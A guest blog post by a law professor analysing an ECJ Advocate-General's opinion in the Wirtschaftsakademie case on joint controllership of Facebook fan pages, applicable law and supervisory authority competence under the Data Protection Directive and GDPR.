In this guest post Lorna Woods, Professor of Internet Law at the University of Essex, provides an analysis on the new ECJ opinion . This post first appeared on the blog of Steve Peers, Professor of EU, Human Rights and World Trade Law at the University of Essex.

Who is responsible for data protection law compliance on Facebook fan sites? That issue is analysed in a recent opinion of an ECJ Advocate-General, in the case of Wirtschaftsakademie (full title: Unabhängiges Landeszentrum für Datenschutz Schleswig-Holstein v Wirtschaftsakademie Schleswig-Holstein GmbH, in the presence of Facebook Ireland Ltd, Vertreter des Bundesinteresses beim Bundesverwaltungsgericht).

This case is one more in a line of cases dealing specifically with the jurisdiction of national data protection supervisory authorities, a line of reasoning which seems to operate separately from the Brussels I Recast Regulation, which concerns jurisdiction of courts over civil and commercial disputes.  While this is an Advocate-General’s opinion, and therefore not binding on the Court, if followed by the Court it would consolidates the Court’s prior broad interpretation of the Data Protection Directive.  While this might be the headline, it is worth considering a perhaps overlooked element of the data-economy: the role of the content provider in providing individuals whose data is harvested.

Facts

Wirtschaftsakademie set up a ‘fan page’ on Facebook.  The data protection authority in Schleswig-Holstein sought the deactivation of the fan page on the basis that visitors to the fan page were not warned that their personal data would be collected by the by means of cookies placed on the visitor’s hard disk. The purpose of that data collection was twofold: to compile viewing statistics for the administrator of the fan page; and to enable Facebook to target advertisements at each visitor by tracking the visitors’ web browsing habits, otherwise known as behavioural advertising.  Such activity must comply with the Data Protection Directive (DPD) (as implemented in the various Member States).  While the content attracting visitors was that of Wirtshaftsakademie, it relied on Facebook for data collection and analysis. It is here that a number of preliminary questions arise:

  • Who is the controller for the purposes of the data protection regime;
  • Which is the applicable national law; and
  • The scope of the national supervisory authority’s regulatory competence?

Opinion

Controller

The referring court had assumed that Wirtschaftsakademie was not a controller as it had no influence, in law or in fact, over the manner in which the personal data was processed by Facebook, and the fact that Wirtschaftsakademie had recourse to analytical tools for its own purposes does not change this [para 28]. Advocate General Bot, however, disagreed with this assessment, arguing that Wirtschaftsakademie was a joint controller for the purposes of the DPD – a possibility for which Article 2(d) DPD makes explicit provision (paras 42, 51, 52].  The Advocate General accepted that while the system was designed by Facebook so as to facilitate a data-driven business model and Wirtschaftsakademie was principally a user of the social network [para 53]. The Advocate General highlighted that without the participation of Wirtschaftsakademie the data processing in respect of the visitors to Wirtschaftsakademie could not occur; and he could end that processing by closing the relevant fan page down. In sum:

Inasmuch as he agrees to the means and purposes of the processing of personal data, as predefined by Facebook, a fan page administrator must be regarded as having participated in the determination of those means and purposes. [para 56]

Advocate General Bot further suggested that the use of the various filters included in the analytical tools provided meant that the user had a direct impact on how data was processed by Facebook. To similar effect, a user can also seek to reach specific audiences, as defined by the user.  As a result, the user has a controlling role in the acquisition phase of data processing by Facebook. The Advocate General rejected an formal analysis based on the terms of the contract concluded by the User and Facebook [para 60] and the fact that the user may be presented with ‘take it or leave it’ terms, does not affect the fact that the user may be a controller.

As a final point, the Advocate General referred to the risk of data protection rules being circumvented, arguing that:

had the Wirtschaftsakademie created a website elsewhere than on Facebook and implemented a tool similar to ‘Facebook Insights’ in order to compile viewing statistics, it would be regarded as the controller of the processing needed to compile those statistics [para 65].

A similar approach should be taken in relation to social media plug ins (such as Facebook’s like button), which allow Facebook to gather data on third party websites without the end-user’s consent (see Case C-40/17 Fashion ID, pending).

Having recognised that joint responsibility was an important factor in ensuring the protection of rights, the Advocate General – referring to the approach of the Article 29 Working Party on data protection – clarified that this did not mean that both parties would have equal responsibility, but rather their respective responsibility would vary depending on their involvement at the various stages of processing activities.

Applicable Law

Facebook is established outside the EU, but it has a number of EU established subsidiaries: the subsidiary which has responsibility for data protection is established in Ireland, while the other subsidiaries have responsibility for the sale of advertising.  This raises a number of questions: can the German supervisory authority exercise its powers and if so, against which subsidiary?

Applicable law is dealt with in Article 4 DPD, which refers to the competence of the Member State where the controller is established but which also envisages the possibility, in the case of a non-EU parent company, of multiple establishments.  The issue comes down to the interpretation of the phrase from Art. 4(1)(a), ‘in the context of the activities of an establishment’, which according to Weltimmo cannot be interpreted restrictively [para 87].  The Advocate General determined that there were two criteria [para 88]:

  • An establishment within the relevant Member State; and
  • Processing in connection with that establishment.

Relying on Weltimmo and Verein für Konsumenteninformation the Advocate General identified factors – which are based on the general freedom of establishment approach to the question of establishment looking for real activity through stable arrangements – the approach is not formalistic. Facebook Germany clearly satisfies these tests.

Referring to Article 29 Working Party Opinion 8/2010, the Advocate General re-iterated that in relation to the second criterion, it is context not location that is important. In Google Spain, the Court of Justice linked the selling of advertising (in Spain) to the processing of data (in the US) to hold that the processing was carried out in the context of the Spanish subsidiary given the economic nexus between the processing and the advertising revenue.  The business set up for Facebook here is the same, and the fact that there is an Irish office does not change the fact that the data processing takes place in the context of the German subsidiary.  The DPD does not introduce a one-stop shop; to the contrary, a deliberate choice was made to allow the application of multiple national legal systems (see Rec 19 DPD), and this approach is supported by the judgment in Verein für Konsumenteninformation in relation to Amazon.  The system will change with the entry into force of the General Data Protection Regulation (GDPR), but the Advocate General proposed that the Court should not pre-empt the entry into force of that legislation (due May 2018) in its interpretation, as the cooperation mechanism on which it depends is not yet in place [para 103].

Regulatory Competence

By contrast to Weltimmo, where the supervisory authority was seeking to impose a fine on a company established in another Member State, here the supervisory authority would be imposing German law on a German company.  There is a question, however, as to the addressee of any enforcement measure. On one interpretation, the German regulator should have the power only to direct compliance on the company established on its territory, even though that might not be effective. Alternatively, the DPD could be interpreted so as to allow the German regulator to direct compliance from Facebook Ireland. Looking at the fundamental role of controllers, Advocate General Bot suggested that this was the preferred solution. Article 28(1), (3) and (6) DPD entitle the supervisory authority of the Member State in which the establishment of the controller is located, by contrast to the position in Weltimmo, to exercise its powers of intervention without being required first to call on the supervisory authority of the Member State in which the controller is located to exercise its powers.

Comment

The novelty in this Opinion relates to the first question is significant because the business model espoused by social media companies depends on the participation of those providing content, who seem at the moment to take little responsibility for their actions.  The price paid by third parties (in terms of data) is facilitated by them, allowing them to avoid or minimise their business costs.  Should there be a consistency of enforcement applications against such users, this may gradually have an effect on the underlying platform’s business model.  While it is harder to regulate mice than elephants, at least these mice appear to be clearly within the geographic jurisdiction of the German regulator – and will remain so even when the GDPR is in force.

The Advocate General went out of his way to explain that there was no difference between the situation in issue here and that in the other relevant pending case, Case C-40/17 Fashion ID.  This case concerns the choice by a website provider to embed third party code allowing the collection of data in respect of visitors in the programming for the website for its own ends (increased visibility of and thus traffic to the website): the code in question is that underpinning the Facebook ‘like’ button, but would also presumably include similar codes from Twitter or Instagram.

If there was any doubt from cases – for example Weltimmo – about whether there is a one-stop shop (ie only one possible supervisory authority with jurisdiction across the EU) in the Data Protection Directive, the Advocate General expressly refutes this point.  In this context, it seems that this case adds little new, rather elaborating points of detail based on the precise factual set-up of Facebook operations in the EU. It seems well-established now that – at least under the DPD – clever multinational corporate structures cannot funnel data protection compliance through a chosen national regime.

It may be worth noting also the broad approach of the Advocate General to Google Spain when determining whether processing is in the context of activities. There the Court observed that:

‘in such circumstances, the activities of the operator of the search engine and those of its establishment situated in the Member State concerned are inextricably linked since the activities relating to the advertising space constitute the means of rendering the search engine at issue economically profitable and that engine is, at the same time, the means enabling those activities to be performed [Google Spain, para 56]

Here, the Advocate General focussed on the fact that social networks such as Facebook generate much of their revenue from advertisements posted on the web pages set up and accessed by users and that there is therefore an indissoluble link between the two activities.  Thus it seems that the Google Spain reasoning applies broadly to many free services paid for by user data, even if third parties – for example those providing the content on the page visited – are involved too.

Of course, the GDPR does introduce a one-stop shop. Arguably therefore these cases are of soon to be historic interest only.  The GDPR proposes that the regulator in respect of the controller’s main EU establishment should have lead responsibility for regulation, with regulators in respect of other Member States being ‘concerned authorities’.  There are two points to note: first, there is a system in place to facilitate the cooperation of the relevant supervisory authorities Art 60), including possible recourse to a ‘consistency mechanism’ (Art 63 et seq); secondly, the competence of the lead authority to act in relation to cross-border processing in Article 66 operates without prejudice to the competence of each national supervisory authority in its own territory set out in Article 55.  The first of these two points concerns the attempt to limit regulatory arbitrage and a downward spiral of standards in the GDPR as applied and the broad approach to establishment. The interest of the recipient state in regulating means that there may be many cases involving ‘concerned authorities’.  The precise implications of the second point are not clear; note however that it seems that the one-stop shop as regards Facebook would not stop data protection authorities taking enforcement action against users such as Wirtschaftsakademie.

Pages